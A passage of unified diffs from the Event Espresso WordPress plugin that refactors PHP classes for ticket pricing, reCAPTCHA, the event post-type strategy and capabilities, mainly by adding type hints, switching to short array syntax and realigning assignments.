         if (empty($template_args['TKT_start_date'])) {
             // if empty then the start date will be now.
-            $template_args['TKT_start_date'] = date(
+            $template_args['TKT_start_date']   = date(
                 $this->_date_time_format,
                 current_time('timestamp')
             );
@@ -1597,14 +1554,14 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
         }
         if (empty($template_args['TKT_end_date'])) {
             // get the earliest datetime (if present);
-            $earliest_dtt = $this->_adminpage_obj->get_cpt_model_obj()->ID() > 0
+            $earliest_datetime = $this->_adminpage_obj->get_cpt_model_obj()->ID() > 0
                 ? $this->_adminpage_obj->get_cpt_model_obj()->get_first_related(
                     'Datetime',
-                    array('order_by' => array('DTT_EVT_start' => 'ASC'))
+                    ['order_by' => ['DTT_EVT_start' => 'ASC']]
                 )
                 : null;
-            if (! empty($earliest_dtt)) {
-                $template_args['TKT_end_date'] = $earliest_dtt->get_datetime(
+            if (! empty($earliest_datetime)) {
+                $template_args['TKT_end_date'] = $earliest_datetime->get_datetime(
                     'DTT_EVT_start',
                     $this->_date_time_format
                 );
@@ -1648,8 +1605,10 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
                 $price_row++;
                 continue;
             }
-            $show_trash = ! ((count($prices) > 1 && $price_row === 1) || count($prices) === 1);
+
+            $show_trash  = ! ((count($prices) > 1 && $price_row === 1) || count($prices) === 1);
             $show_create = ! (count($prices) > 1 && count($prices) !== $price_row);
+
             $template_args['ticket_price_rows'] .= $this->_get_ticket_price_row(
                 $ticket_row,
                 $price_row,
@@ -1687,15 +1646,16 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
      * @return string
      * @throws DomainException
      * @throws EE_Error
+     * @throws ReflectionException
      */
-    protected function _get_tax_rows($ticket_row, $ticket)
+    protected function _get_tax_rows(int $ticket_row, ?EE_Ticket $ticket): string
     {
         $tax_rows = '';
         /** @var EE_Price[] $taxes */
         $taxes = empty($ticket) ? EE_Taxes::get_taxes_for_admin() : $ticket->get_ticket_taxes_for_admin();
         foreach ($taxes as $tax) {
-            $tax_added = $this->_get_tax_added($tax, $ticket);
-            $template_args = array(
+            $tax_added     = $this->_get_tax_added($tax, $ticket);
+            $template_args = [
                 'display_tax'       => ! empty($ticket) && $ticket->get('TKT_taxable')
                     ? ''
                     : 'display:none;',
@@ -1705,7 +1665,7 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
                 'tax_added'         => $tax_added,
                 'tax_added_display' => EEH_Template::format_currency($tax_added, false, false),
                 'tax_amount'        => $tax->get('PRC_amount'),
-            );
+            ];
             $template_args = apply_filters(
                 'FHEE__espresso_events_Pricing_Hooks___get_tax_rows__template_args',
                 $template_args,
@@ -1713,7 +1673,7 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
                 $ticket,
                 $this->_is_creating_event
             );
-            $tax_rows .= EEH_Template::display_template(
+            $tax_rows      .= EEH_Template::display_template(
                 PRICING_TEMPLATE_PATH . 'event_tickets_datetime_ticket_tax_row.template.php',
                 $template_args,
                 true
@@ -1728,8 +1688,9 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
      * @param EE_Ticket|null $ticket
      * @return float|int
      * @throws EE_Error
+     * @throws ReflectionException
      */
-    protected function _get_tax_added(EE_Price $tax, $ticket)
+    protected function _get_tax_added(EE_Price $tax, ?EE_Ticket $ticket)
     {
         $subtotal = empty($ticket) ? 0 : $ticket->get_ticket_subtotal();
         return $subtotal * $tax->get('PRC_amount') / 100;
@@ -1744,7 +1705,7 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
      * @param EE_Ticket|null $ticket
      * @param bool           $show_trash
      * @param bool           $show_create
-     * @return mixed
+     * @return string
      * @throws InvalidArgumentException
      * @throws InvalidInterfaceException
      * @throws InvalidDataTypeException
@@ -1753,16 +1714,16 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
      * @throws ReflectionException
      */
     protected function _get_ticket_price_row(
-        $ticket_row,
-        $price_row,
-        $price,
-        $default,
-        $ticket,
-        $show_trash = true,
-        $show_create = true
-    ) {
+        int $ticket_row,
+        int $price_row,
+        ?EE_Price $price,
+        bool $default,
+        ?EE_Ticket $ticket,
+        bool $show_trash = true,
+        bool $show_create = true
+    ): string {
         $send_disabled = ! empty($ticket) && $ticket->get('TKT_deleted');
-        $template_args = array(
+        $template_args = [
             'tkt_row'               => $default && empty($ticket)
                 ? 'TICKETNUM'
                 : $ticket_row,
@@ -1773,7 +1734,7 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
                 ? 'PRICENAMEATTR'
                 : 'edit_prices',
             'price_type_selector'   => $default && empty($price)
-                ? $this->_get_base_price_template($ticket_row, $price_row, $price, $default)
+                ? $this->_get_base_price_template($ticket_row, $price_row, $price, true)
                 : $this->_get_price_type_selector(
                     $ticket_row,
                     $price_row,
@@ -1819,7 +1780,7 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
                 ? ''
                 : $price->get('PRC_desc'),
             'disabled'              => ! empty($ticket) && $ticket->get('TKT_deleted'),
-        );
+        ];
         $template_args = apply_filters(
             'FHEE__espresso_events_Pricing_Hooks___get_ticket_price_row__template_args',
             $template_args,
@@ -1841,12 +1802,12 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
 
 
     /**
-     * @param int      $ticket_row
-     * @param int      $price_row
-     * @param EE_Price $price
-     * @param bool     $default
-     * @param bool     $disabled
-     * @return mixed
+     * @param int           $ticket_row
+     * @param int           $price_row
+     * @param EE_Price|null $price
+     * @param bool          $default
+     * @param bool          $disabled
+     * @return string
      * @throws ReflectionException
      * @throws InvalidArgumentException
      * @throws InvalidInterfaceException
@@ -1854,8 +1815,13 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
      * @throws DomainException
      * @throws EE_Error
      */
-    protected function _get_price_type_selector($ticket_row, $price_row, $price, $default, $disabled = false)
-    {
+    protected function _get_price_type_selector(
+        int $ticket_row,
+        int $price_row,
+        ?EE_Price $price,
+        bool $default,
+        bool $disabled = false
+    ): string {
         if ($price->is_base_price()) {
             return $this->_get_base_price_template(
                 $ticket_row,
@@ -1875,24 +1841,29 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
 
 
     /**
-     * @param int      $ticket_row
-     * @param int      $price_row
-     * @param EE_Price $price
-     * @param bool     $default
-     * @return mixed
+     * @param int           $ticket_row
+     * @param int           $price_row
+     * @param EE_Price|null $price
+     * @param bool          $default
+     * @return string
      * @throws DomainException
      * @throws EE_Error
+     * @throws ReflectionException
      */
-    protected function _get_base_price_template($ticket_row, $price_row, $price, $default)
-    {
-        $template_args = array(
+    protected function _get_base_price_template(
+        int $ticket_row,
+        int $price_row,
+        ?EE_Price $price,
+        bool $default
+    ): string {
+        $template_args = [
             'tkt_row'                   => $default ? 'TICKETNUM' : $ticket_row,
             'PRC_order'                 => $default && empty($price) ? 'PRICENUM' : $price_row,
             'PRT_ID'                    => $default && empty($price) ? 1 : $price->get('PRT_ID'),
             'PRT_name'                  => esc_html__('Price', 'event_espresso'),
             'price_selected_operator'   => '+',
             'price_selected_is_percent' => 0,
-        );
+        ];
         $template_args = apply_filters(
             'FHEE__espresso_events_Pricing_Hooks___get_base_price_template__template_args',
             $template_args,
@@ -1911,12 +1882,12 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
 
 
     /**
-     * @param int      $ticket_row
-     * @param int      $price_row
-     * @param EE_Price $price
-     * @param bool     $default
-     * @param bool     $disabled
-     * @return mixed
+     * @param int           $ticket_row
+     * @param int           $price_row
+     * @param EE_Price|null $price
+     * @param bool          $default
+     * @param bool          $disabled
+     * @return string
      * @throws ReflectionException
      * @throws InvalidArgumentException
      * @throws InvalidInterfaceException
@@ -1925,30 +1896,32 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
      * @throws EE_Error
      */
     protected function _get_price_modifier_template(
-        $ticket_row,
-        $price_row,
-        $price,
-        $default,
-        $disabled = false
-    ) {
+        int $ticket_row,
+        int $price_row,
+        ?EE_Price $price,
+        bool $default,
+        bool $disabled = false
+    ): string {
         $select_name = $default && ! $price instanceof EE_Price
             ? 'edit_prices[TICKETNUM][PRICENUM][PRT_ID]'
             : 'edit_prices[' . esc_attr($ticket_row) . '][' . esc_attr($price_row) . '][PRT_ID]';
         /** @var EEM_Price_Type $price_type_model */
-        $price_type_model = EE_Registry::instance()->load_model('Price_Type');
-        $price_types = $price_type_model->get_all(array(
-            array(
-                'OR' => array(
-                    'PBT_ID'  => '2',
-                    'PBT_ID*' => '3',
-                ),
-            ),
-        ));
-        $all_price_types = $default && ! $price instanceof EE_Price
-            ? array(esc_html__('Select Modifier', 'event_espresso'))
-            : array();
+        $price_type_model       = EE_Registry::instance()->load_model('Price_Type');
+        $price_types            = $price_type_model->get_all(
+            [
+                [
+                    'OR' => [
+                        'PBT_ID'  => '2',
+                        'PBT_ID*' => '3',
+                    ],
+                ],
+            ]
+        );
+        $all_price_types        = $default && ! $price instanceof EE_Price
+            ? [esc_html__('Select Modifier', 'event_espresso')]
+            : [];
         $selected_price_type_id = $default && ! $price instanceof EE_Price ? 0 : $price->type();
-        $price_option_spans = '';
+        $price_option_spans     = '';
         // setup price types for selector
         foreach ($price_types as $price_type) {
             if (! $price_type instanceof EE_Price_Type) {
@@ -1956,33 +1929,37 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
             }
             $all_price_types[ $price_type->ID() ] = $price_type->get('PRT_name');
             // while we're in the loop let's setup the option spans used by js
-            $span_args = array(
+            $span_args          = [
                 'PRT_ID'         => $price_type->ID(),
                 'PRT_operator'   => $price_type->is_discount() ? '-' : '+',
                 'PRT_is_percent' => $price_type->get('PRT_is_percent') ? 1 : 0,
-            );
+            ];
             $price_option_spans .= EEH_Template::display_template(
                 PRICING_TEMPLATE_PATH . 'event_tickets_datetime_price_option_span.template.php',
                 $span_args,
                 true
             );
         }
-        $select_name = $disabled ? 'archive_price[' . $ticket_row . '][' . $price_row . '][PRT_ID]'
+
+        $select_name = $disabled
+            ? 'archive_price[' . $ticket_row . '][' . $price_row . '][PRT_ID]'
             : $select_name;
+
         $select_input = new EE_Select_Input(
             $all_price_types,
-            array(
+            [
                 'default'               => $selected_price_type_id,
                 'html_name'             => $select_name,
                 'html_class'            => 'edit-price-PRT_ID',
                 'other_html_attributes' => $disabled ? 'style="width:auto;" disabled' : 'style="width:auto;"',
-            )
+            ]
         );
-        $price_selected_operator = $price instanceof EE_Price && $price->is_discount() ? '-' : '+';
-        $price_selected_operator = $default && ! $price instanceof EE_Price ? '' : $price_selected_operator;
+
+        $price_selected_operator   = $price instanceof EE_Price && $price->is_discount() ? '-' : '+';
+        $price_selected_operator   = $default && ! $price instanceof EE_Price ? '' : $price_selected_operator;
         $price_selected_is_percent = $price instanceof EE_Price && $price->is_percent() ? 1 : 0;
         $price_selected_is_percent = $default && ! $price instanceof EE_Price ? '' : $price_selected_is_percent;
-        $template_args = array(
+        $template_args             = [
             'tkt_row'                   => $default ? 'TICKETNUM' : $ticket_row,
             'PRC_order'                 => $default && ! $price instanceof EE_Price ? 'PRICENUM' : $price_row,
             'price_modifier_selector'   => $select_input->get_html_for_input(),
@@ -1992,8 +1969,8 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
             'price_selected_operator'   => $price_selected_operator,
             'price_selected_is_percent' => $price_selected_is_percent,
             'disabled'                  => $disabled,
-        );
-        $template_args = apply_filters(
+        ];
+        $template_args             = apply_filters(
             'FHEE__espresso_events_Pricing_Hooks___get_price_modifier_template__template_args',
             $template_args,
             $ticket_row,
@@ -2018,40 +1995,41 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
      * @param EE_Ticket|null   $ticket
      * @param array            $ticket_datetimes
      * @param bool             $default
-     * @return mixed
+     * @return string
      * @throws DomainException
      * @throws EE_Error
+     * @throws ReflectionException
      */
     protected function _get_ticket_datetime_list_item(
-        $datetime_row,
-        $ticket_row,
-        $datetime,
-        $ticket,
-        $ticket_datetimes = array(),
-        $default = false
-    ) {
-        $tkt_datetimes = $ticket instanceof EE_Ticket && isset($ticket_datetimes[ $ticket->ID() ])
+        int $datetime_row,
+        int $ticket_row,
+        ?EE_Datetime $datetime,
+        ?EE_Ticket $ticket,
+        array $ticket_datetimes = [],
+        bool $default = false
+    ): string {
+        $ticket_datetimes = $ticket instanceof EE_Ticket && isset($ticket_datetimes[ $ticket->ID() ])
             ? $ticket_datetimes[ $ticket->ID() ]
-            : array();
-        $template_args = array(
+            : [];
+        $template_args    = [
             'dtt_row'                  => $default && ! $datetime instanceof EE_Datetime
                 ? 'DTTNUM'
                 : $datetime_row,
             'tkt_row'                  => $default
                 ? 'TICKETNUM'
                 : $ticket_row,
-            'ticket_datetime_selected' => in_array($datetime_row, $tkt_datetimes, true)
+            'ticket_datetime_selected' => in_array($datetime_row, $ticket_datetimes, true)
                 ? ' ticket-selected'
                 : '',
-            'ticket_datetime_checked'  => in_array($datetime_row, $tkt_datetimes, true)
+            'ticket_datetime_checked'  => in_array($datetime_row, $ticket_datetimes, true)
                 ? ' checked'
                 : '',
             'DTT_name'                 => $default && empty($datetime)
                 ? 'DTTNAME'
                 : $datetime->get_dtt_display_name(true),
             'tkt_status_class'         => '',
-        );
-        $template_args = apply_filters(
+        ];
+        $template_args    = apply_filters(
             'FHEE__espresso_events_Pricing_Hooks___get_ticket_datetime_list_item__template_args',
             $template_args,
             $datetime_row,
@@ -2073,7 +2051,7 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
     /**
      * @param array $all_datetimes
      * @param array $all_tickets
-     * @return mixed
+     * @return string
      * @throws ReflectionException
      * @throws InvalidArgumentException
      * @throws InvalidInterfaceException
@@ -2081,29 +2059,30 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
      * @throws DomainException
      * @throws EE_Error
      */
-    protected function _get_ticket_js_structure($all_datetimes = array(), $all_tickets = array())
+    protected function _get_ticket_js_structure(array $all_datetimes = [], array $all_tickets = []): string
     {
-        $template_args = array(
-            'default_datetime_edit_row'                => $this->_get_dtt_edit_row(
+        $template_args = [
+            'default_datetime_edit_row' => $this->_get_dtt_edit_row(
                 'DTTNUM',
                 null,
                 true,
                 $all_datetimes
             ),
-            'default_ticket_row'                       => $this->_get_ticket_row(
+            'default_ticket_row'        => $this->_get_ticket_row(
                 'TICKETNUM',
                 null,
-                array(),
-                array(),
+                [],
+                [],
                 true
             ),
-            'default_price_row'                        => $this->_get_ticket_price_row(
+            'default_price_row'         => $this->_get_ticket_price_row(
                 'TICKETNUM',
                 'PRICENUM',
                 null,
                 true,
                 null
             ),
+
             'default_price_rows'                       => '',
             'default_base_price_amount'                => 0,
             'default_base_price_name'                  => '',
@@ -2117,8 +2096,8 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
             'default_available_tickets_for_datetime'   => $this->_get_dtt_attached_tickets_row(
                 'DTTNUM',
                 null,
-                array(),
-                array(),
+                [],
+                [],
                 true
             ),
             'existing_available_datetime_tickets_list' => '',
@@ -2128,7 +2107,7 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
                 'TICKETNUM',
                 null,
                 null,
-                array(),
+                [],
                 true
             ),
             'new_available_ticket_datetime_list_item'  => $this->_get_ticket_datetime_list_item(
@@ -2136,18 +2115,18 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
                 'TICKETNUM',
                 null,
                 null,
-                array(),
+                [],
                 true
             ),
-        );
-        $ticket_row = 1;
+        ];
+        $ticket_row    = 1;
         foreach ($all_tickets as $ticket) {
             $template_args['existing_available_datetime_tickets_list'] .= $this->_get_datetime_tickets_list_item(
                 'DTTNUM',
                 $ticket_row,
                 null,
                 $ticket,
-                array(),
+                [],
                 true
             );
             $ticket_row++;
@@ -2159,34 +2138,33 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
                 'TICKETNUM',
                 $datetime,
                 null,
-                array(),
+                [],
                 true
             );
             $datetime_row++;
         }
         /** @var EEM_Price $price_model */
-        $price_model = EE_Registry::instance()->load_model('Price');
+        $price_model    = EE_Registry::instance()->load_model('Price');
         $default_prices = $price_model->get_all_default_prices();
-        $price_row = 1;
+        $price_row      = 1;
         foreach ($default_prices as $price) {
             if (! $price instanceof EE_Price) {
                 continue;
             }
             if ($price->is_base_price()) {
-                $template_args['default_base_price_amount'] = $price->get_pretty(
+                $template_args['default_base_price_amount']      = $price->get_pretty(
                     'PRC_amount',
                     'localized_float'
                 );
-                $template_args['default_base_price_name'] = $price->get('PRC_name');
+                $template_args['default_base_price_name']        = $price->get('PRC_name');
                 $template_args['default_base_price_description'] = $price->get('PRC_desc');
                 $price_row++;
                 continue;
             }
-            $show_trash = ! ((count($default_prices) > 1 && $price_row === 1)
-                             || count($default_prices) === 1);
-            $show_create = ! (count($default_prices) > 1
-                              && count($default_prices)
-                                 !== $price_row);
+
+            $show_trash  = ! ((count($default_prices) > 1 && $price_row === 1) || count($default_prices) === 1);
+            $show_create = ! (count($default_prices) > 1 && count($default_prices) !== $price_row);
+
             $template_args['default_price_rows'] .= $this->_get_ticket_price_row(
                 'TICKETNUM',
                 $price_row,

--- a/caffeinated/modules/recaptcha_invisible/EED_Recaptcha_Invisible.module.php
+++ b/caffeinated/modules/recaptcha_invisible/EED_Recaptcha_Invisible.module.php
@@ -244,7 +244,7 @@ class EED_Recaptcha_Invisible extends EED_Module
      * @throws InvalidInterfaceException
      * @throws RuntimeException
      */
-    public static function receiveSpcoRegStepForm($req_data = array(), EE_Form_Section_Proper $reg_form)
+    public static function receiveSpcoRegStepForm($req_data, EE_Form_Section_Proper $reg_form)
     {
         // do nothing if form isn't for a reg step or test has already been passed
         if (! EED_Recaptcha_Invisible::processSpcoRegStepForm($reg_form)) {
@@ -277,7 +277,7 @@ class EED_Recaptcha_Invisible extends EED_Module
      * @throws ReflectionException
      * @throws DomainException
      */
-    public static function ticketSelectorForm($html = '', EE_Event $event, $iframe = false)
+    public static function ticketSelectorForm(string $html, EE_Event $event, $iframe = false)
     {
         $recaptcha = RecaptchaFactory::create();
         // do nothing if test has  already  been passed

--- a/core/CPTs/EE_CPT_Event_Strategy.core.php
+++ b/core/CPTs/EE_CPT_Event_Strategy.core.php
@@ -21,17 +21,17 @@ class EE_CPT_Event_Strategy
 
 
     /**
-     * @param WP_Query $wp_query
-     * @param array    $CPT
+     * @param array|WP_Query $wp_query
+     * @param array          $CPT
      */
-    public function __construct($wp_query, $CPT = array())
+    public function __construct($wp_query, array $CPT = array())
     {
         if ($wp_query instanceof WP_Query) {
             $WP_Query = $wp_query;
             $this->CPT = $CPT;
         } else {
-            $WP_Query = isset($wp_query['WP_Query']) ? $wp_query['WP_Query'] : null;
-            $this->CPT = isset($wp_query['CPT']) ? $wp_query['CPT'] : null;
+            $WP_Query = $wp_query['WP_Query'] ?? null;
+            $this->CPT = $wp_query['CPT'] ?? null;
         }
         // !!!!!!!!!!  IMPORTANT !!!!!!!!!!!!
         // here's the list of available filters in the WP_Query object
@@ -256,13 +256,13 @@ class EE_CPT_Event_Strategy
 
 
     /**
-     * @param null $meta_value
-     * @param      $post_id
-     * @param      $meta_key
-     * @param      $single
-     * @return    string
+     * @param mixed $meta_value
+     * @param $post_id
+     * @param $meta_key
+     * @param $single
+     * @return mixed
      */
-    public function get_EE_post_type_metadata($meta_value = null, $post_id, $meta_key, $single)
+    public function get_EE_post_type_metadata($meta_value, $post_id, $meta_key, $single)
     {
         return $meta_value;
     }

--- a/core/CPTs/EE_CPT_Event_Strategy.core.php
+++ b/core/CPTs/EE_CPT_Event_Strategy.core.php
@@ -1,8 +1,5 @@
 <?php
 
-use EventEspresso\core\exceptions\InvalidDataTypeException;
-use EventEspresso\core\exceptions\InvalidInterfaceException;
-
 /**
  *EE_CPT_Event_Strategy
  *
@@ -24,13 +21,13 @@ class EE_CPT_Event_Strategy
      * @param array|WP_Query $wp_query
      * @param array          $CPT
      */
-    public function __construct($wp_query, array $CPT = array())
+    public function __construct($wp_query, array $CPT = [])
     {
         if ($wp_query instanceof WP_Query) {
-            $WP_Query = $wp_query;
+            $WP_Query  = $wp_query;
             $this->CPT = $CPT;
         } else {
-            $WP_Query = $wp_query['WP_Query'] ?? null;
+            $WP_Query  = $wp_query['WP_Query'] ?? null;
             $this->CPT = $wp_query['CPT'] ?? null;
         }
         // !!!!!!!!!!  IMPORTANT !!!!!!!!!!!!
@@ -46,10 +43,10 @@ class EE_CPT_Event_Strategy
         // 'posts_join'
         $this->_add_filters();
         if ($WP_Query instanceof WP_Query) {
-            $WP_Query->is_espresso_event_single = is_singular()
-                                                  && isset($WP_Query->query->post_type)
-                                                  && $WP_Query->query->post_type === 'espresso_events';
-            $WP_Query->is_espresso_event_archive = is_post_type_archive('espresso_events');
+            $WP_Query->is_espresso_event_single   = is_singular()
+                                                    && isset($WP_Query->query->post_type)
+                                                    && $WP_Query->query->post_type === 'espresso_events';
+            $WP_Query->is_espresso_event_archive  = is_post_type_archive('espresso_events');
             $WP_Query->is_espresso_event_taxonomy = is_tax('espresso_event_categories');
         }
     }
@@ -62,13 +59,13 @@ class EE_CPT_Event_Strategy
      */
     protected function _add_filters()
     {
-        add_filter('posts_fields', array($this, 'posts_fields'), 1, 2);
-        add_filter('posts_join', array($this, 'posts_join'), 1, 2);
-        add_filter('posts_where', array($this, 'posts_where'), 10, 2);
+        add_filter('posts_fields', [$this, 'posts_fields'], 1, 2);
+        add_filter('posts_join', [$this, 'posts_join'], 1, 2);
+        add_filter('posts_where', [$this, 'posts_where'], 10, 2);
         // add_filter( 'the_posts', array( $this, 'the_posts' ), 1, 2 );
-        add_filter('posts_orderby', array($this, 'posts_orderby'), 1, 2);
-        add_filter('posts_groupby', array($this, 'posts_groupby'), 1, 2);
-        add_action('posts_selection', array($this, 'remove_filters'));
+        add_filter('posts_orderby', [$this, 'posts_orderby'], 1, 2);
+        add_filter('posts_groupby', [$this, 'posts_groupby'], 1, 2);
+        add_action('posts_selection', [$this, 'remove_filters']);
     }
 
 
@@ -90,31 +87,28 @@ class EE_CPT_Event_Strategy
      */
     protected function _remove_filters()
     {
-        remove_filter('posts_fields', array($this, 'posts_fields'), 1);
-        remove_filter('posts_join', array($this, 'posts_join'), 1);
-        remove_filter('posts_where', array($this, 'posts_where'), 10);
+        remove_filter('posts_fields', [$this, 'posts_fields'], 1);
+        remove_filter('posts_join', [$this, 'posts_join'], 1);
+        remove_filter('posts_where', [$this, 'posts_where']);
         // remove_filter( 'the_posts', array( $this, 'the_posts' ), 1 );
-        remove_filter('posts_orderby', array($this, 'posts_orderby'), 1);
-        remove_filter('posts_groupby', array($this, 'posts_groupby'), 1);
-        remove_action('posts_selection', array($this, 'remove_filters'));
+        remove_filter('posts_orderby', [$this, 'posts_orderby'], 1);
+        remove_filter('posts_groupby', [$this, 'posts_groupby'], 1);
+        remove_action('posts_selection', [$this, 'remove_filters']);
     }
 
 
     /**
-     * @param string   $SQL
-     * @param WP_Query $wp_query
+     * @param string        $SQL
+     * @param WP_Query|null $wp_query
      * @return    string
      * @throws EE_Error
-     * @throws InvalidArgumentException
-     * @throws InvalidDataTypeException
-     * @throws InvalidInterfaceException
+     * @throws ReflectionException
      */
-    public function posts_fields($SQL, WP_Query $wp_query)
+    public function posts_fields(string $SQL, ?WP_Query $wp_query): string
     {
         if (
             $wp_query instanceof WP_Query
-            &&
-            (
+            && (
                 $wp_query->is_espresso_event_single
                 || $wp_query->is_espresso_event_archive
                 || $wp_query->is_espresso_event_taxonomy
@@ -135,20 +129,17 @@ class EE_CPT_Event_Strategy
 
 
     /**
-     * @param string   $SQL
-     * @param WP_Query $wp_query
+     * @param string        $SQL
+     * @param WP_Query|null $wp_query
      * @return string
      * @throws EE_Error
-     * @throws InvalidArgumentException
-     * @throws InvalidDataTypeException
-     * @throws InvalidInterfaceException
+     * @throws ReflectionException
      */
-    public function posts_join($SQL, WP_Query $wp_query)
+    public function posts_join(string $SQL, ?WP_Query $wp_query): string
     {
         if (
             $wp_query instanceof WP_Query
-            &&
-            (
+            && (
                 $wp_query->is_espresso_event_single
                 || $wp_query->is_espresso_event_archive
                 || $wp_query->is_espresso_event_taxonomy
@@ -166,20 +157,17 @@ class EE_CPT_Event_Strategy
 
 
     /**
-     * @param string   $SQL
-     * @param WP_Query $wp_query
+     * @param string        $SQL
+     * @param WP_Query|null $wp_query
      * @return string
      * @throws EE_Error
-     * @throws InvalidArgumentException
-     * @throws InvalidDataTypeException
-     * @throws InvalidInterfaceException
+     * @throws ReflectionException
      */
-    public function posts_where($SQL, WP_Query $wp_query)
+    public function posts_where(string $SQL, ?WP_Query $wp_query): string
     {
         if (
             $wp_query instanceof WP_Query
-            &&
-            (
+            && (
                 $wp_query->is_espresso_event_archive
                 || $wp_query->is_espresso_event_taxonomy
             )
@@ -198,16 +186,15 @@ class EE_CPT_Event_Strategy
 
 
     /**
-     * @param string   $SQL
-     * @param WP_Query $wp_query
+     * @param string        $SQL
+     * @param WP_Query|null $wp_query
      * @return string
      */
-    public function posts_orderby($SQL, WP_Query $wp_query)
+    public function posts_orderby(string $SQL, ?WP_Query $wp_query): string
     {
         if (
             $wp_query instanceof WP_Query
-            &&
-            (
+            && (
                 $wp_query->is_espresso_event_archive
                 || $wp_query->is_espresso_event_taxonomy
             )
@@ -219,16 +206,15 @@ class EE_CPT_Event_Strategy
 
 
     /**
-     * @param string   $SQL
-     * @param WP_Query $wp_query
+     * @param string        $SQL
+     * @param WP_Query|null $wp_query
      * @return string
      */
-    public function posts_groupby($SQL, WP_Query $wp_query)
+    public function posts_groupby(string $SQL, ?WP_Query $wp_query): string
     {
         if (
             $wp_query instanceof WP_Query
-            &&
-            (
+            && (
                 $wp_query->is_espresso_event_archive
                 || $wp_query->is_espresso_event_taxonomy
             )
@@ -245,11 +231,11 @@ class EE_CPT_Event_Strategy
 
 
     /**
-     * @param array    $posts
-     * @param WP_Query $wp_query
+     * @param array         $posts
+     * @param WP_Query|null $wp_query
      * @return array
      */
-    public function the_posts($posts, WP_Query $wp_query)
+    public function the_posts(array $posts, WP_Query $wp_query): array
     {
         return $posts;
     }
@@ -257,9 +243,9 @@ class EE_CPT_Event_Strategy
 
     /**
      * @param mixed $meta_value
-     * @param $post_id
-     * @param $meta_key
-     * @param $single
+     * @param       $post_id
+     * @param       $meta_key
+     * @param       $single
      * @return mixed
      */
     public function get_EE_post_type_metadata($meta_value, $post_id, $meta_key, $single)

--- a/core/EE_Capabilities.core.php
+++ b/core/EE_Capabilities.core.php
@@ -755,8 +755,12 @@ final class EE_Capabilities extends EE_Base
      * @see   wp-includes/capabilities.php
      * @since 4.5.0
      */
-    public function add_cap_to_role($role, string $cap, bool $grant = true, bool $update_capabilities_map = true):
-    bool {
+    public function add_cap_to_role(
+        $role,
+        string $cap,
+        bool $grant = true,
+        bool $update_capabilities_map = true
+    ): bool {
         // capture incoming value for $role because we may need it to create a new WP_Role
         $orig_role = $role;
         $role      = $role instanceof WP_Role ? $role : get_role($role);
@@ -1009,20 +1013,35 @@ final class EE_Capabilities extends EE_Base
  */
 abstract class EE_Meta_Capability_Map
 {
-    public $meta_cap;
-
     /**
      * @var EEM_Base
      */
     protected $_model;
 
+    /**
+     * @var string
+     */
     protected $_model_name;
 
-    public    $published_cap = '';
+    /**
+     * @var string
+     */
+    public $meta_cap;
 
-    public    $others_cap    = '';
+    /**
+     * @var string
+     */
+    public $published_cap = '';
 
-    public    $private_cap   = '';
+    /**
+     * @var string
+     */
+    public $others_cap = '';
+
+    /**
+     * @var string
+     */
+    public $private_cap = '';
 
 
     /**

--- a/core/EE_Capabilities.core.php
+++ b/core/EE_Capabilities.core.php
@@ -13,6 +13,12 @@
  */
 final class EE_Capabilities extends EE_Base
 {
+
+    const ROLE_ADMINISTRATOR = 'administrator';
+
+    const ROLE_EVENTS_ADMINISTRATOR = 'ee_events_administrator';
+
+
     /**
      * the name of the wp option used to store caps previously initialized
      */
@@ -341,7 +347,7 @@ final class EE_Capabilities extends EE_Base
         return apply_filters(
             'FHEE__EE_Capabilities__init_caps_map__caps',
             array(
-                'administrator'           => array(
+                EE_Capabilities::ROLE_ADMINISTRATOR => array(
                     // basic access
                     'ee_read_ee',
                     // gateways
@@ -461,7 +467,7 @@ final class EE_Capabilities extends EE_Base
                     'ee_edit_event_type',
                     'ee_delete_event_type',
                 ),
-                'ee_events_administrator' => array(
+                EE_Capabilities::ROLE_EVENTS_ADMINISTRATOR => array(
                     // core wp caps
                     'read',
                     'read_private_pages',
@@ -935,23 +941,21 @@ final class EE_Capabilities extends EE_Base
     /**
      * This helper method just returns an array of registered EE capabilities.
      *
-     * @since 4.5.0
-     * @param string $role If empty then the entire role/capability map is returned.
-     *                     Otherwise just the capabilities for the given role are returned.
+     * @param string|null $role If empty then the entire role/capability map is returned.
+     *                          Otherwise just the capabilities for the given role are returned.
      * @return array
      * @throws EE_Error
+     * @since 4.5.0
      */
-    public function get_ee_capabilities($role = 'administrator')
+    public function get_ee_capabilities(?string $role = EE_Capabilities::ROLE_ADMINISTRATOR): array
     {
         if (! $this->initialized) {
             $this->init_caps();
         }
-        if (empty($role)) {
+        if ($role === '') {
             return $this->capabilities_map;
         }
-        return isset($this->capabilities_map[ $role ])
-            ? $this->capabilities_map[ $role ]
-            : array();
+        return $this->capabilities_map[ $role ] ?? [];
     }
 
 

--- a/core/EE_Capabilities.core.php
+++ b/core/EE_Capabilities.core.php
@@ -13,7 +13,6 @@
  */
 final class EE_Capabilities extends EE_Base
 {
-
     const ROLE_ADMINISTRATOR = 'administrator';
 
     const ROLE_EVENTS_ADMINISTRATOR = 'ee_events_administrator';

--- a/core/EE_Capabilities.core.php
+++ b/core/EE_Capabilities.core.php
@@ -13,7 +13,7 @@
